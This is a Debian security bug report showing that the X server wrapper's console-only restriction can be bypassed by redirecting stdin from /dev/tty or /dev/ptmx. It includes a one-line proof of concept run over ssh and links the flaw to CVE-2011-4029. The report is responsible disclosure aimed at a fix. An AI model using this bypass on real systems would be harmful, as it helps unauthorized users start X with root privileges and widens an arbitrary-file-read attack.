
Bug#652249: bypass default security level of the X wrapper



Package: xserver-xorg
Version: 1:7.5+8
Severity: important
Tags: security


By default, the wrapper's configuration file only allows users who control
a TTY (console) to start the X server with root privileges:

  # cat /etc/X11/Xwrapper.config
  [...]
  allowed_users=console

To determine if a user is controlling a TTY, the code checks the
properties of the file connected to its standard input:

  $ cat -n debian/local/xserver-wrapper.c
  [...]
  152 static int
  153 onConsole()
  154 {
  155 #if defined(__linux__)
  156   struct stat s;
  157
  158   /* see if stdin is a virtual console device */
  159   if (fstat(0, &s) != 0) {
  160     (void) fprintf(stderr, "X: cannot stat stdin\n");
  161     return FALSE;
  162   }
  163   if (S_ISCHR(s.st_mode) &&
  164         ((((s.st_rdev >> 8) & 0xff) == TTY_MAJOR_DEV &&
  165           (s.st_rdev & 0xff) < 64) ||
  166         (((s.st_rdev >> 8) & 0xff) == ALT_TTY_MAJOR_DEV &&
  167           (s.st_rdev & 0xff) < 64)
  168         )) {
  169     return TRUE;
  170   }

As seen, this is done by checking if this file:

  - is a character device [line 163]
  - has a TTY-specific major number (TTY_MAJOR_DEV or ALT_TTY_MAJOR_DEV,
    respectively 4 or 5) [lines 164, 166]
  - has a minor number lower than 64 [lines 165, 167]

Unfortunately, by connecting a file with similar properties to its
stdin, a user can mislead the X wrapper and launch the X server.  This
file also needs to be readable by the user.

For instance, files "/dev/tty" and "/dev/ptmx" match those conditions:

  $ ls -l /dev/tty /dev/ptmx
  crw-rw-rw- 1 root root 5, 2 14 déc.  18:43 /dev/ptmx
  crw-rw-rw- 1 root root 5, 0 12 déc.  23:03 /dev/tty

Here is a quick PoC using "/dev/tty":

  $ ssh remote_host
  $ id
  uid=1000(vladz) gid=1000(vladz) groups=1000(vladz)
  $ tty
  /dev/pts/4   // not a TTY, won't have sufficient permissions to start X
  $ X :1
  X: user not authorized to run the X server, aborting.

  // This was the expected result, now let's connect "/dev/tty" to stdin and
  // retry...

  $ exec 0</dev/tty; X :1; exec 0</dev/pts/4
  [... Xorg starts ...]    // start succeeded!

This being said, this is a minor issue on its own, but the attack against
CVE-2011-4029 [1], which allows setting the read permission on any arbitrary
file, can now be launched from remote sessions and no longer requires a TTY.
It becomes urgent to fix it.

  [1] http://security-tracker.debian.org/tracker/CVE-2011-4029

Thanks,
vladz. 

-- 
http://vladz.devzero.fr
PGP key 8F7E2D3C from pgp.mit.edu